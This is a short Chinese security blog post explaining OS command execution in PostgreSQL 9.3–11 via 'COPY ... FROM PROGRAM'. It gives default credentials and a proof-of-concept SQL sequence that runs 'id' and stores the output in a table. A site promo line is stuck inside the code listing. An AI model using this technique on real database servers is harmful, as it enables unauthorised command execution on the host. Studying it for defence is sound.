PostgreSQL 高权限命令执行漏洞

华盟原创文章投稿奖励计划

PostgreSQL 是一款关系型数据库。其9.3到11版本中存在一处“特性”,管理员或具有“COPY TO/FROM PROGRAM”权限的用户,可以使用这个特性执行任意命令。

默认账号密码为postgres/postgres。
首先连接到postgres中,并执行参考链接中的POC:

  1. <font face="宋体" size="4">DROP TABLE IF EXISTS cmd_exec;

  2. CREATE TABLE cmd_exec(cmd_output text);

  3. COPY cmd_exec FROM PROGRAM 'id';

  4. 华盟知识星球入口

    SELECT * FROM cmd_exec;</font>

PostgreSQL 高权限命令执行漏洞

PostgreSQL 高权限命令执行漏洞

FROM PROGRAM语句将执行命令id并将结果保存在cmd_exec表中
大概就这些……

本文原创,作者:congtou,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/269550.html

发表评论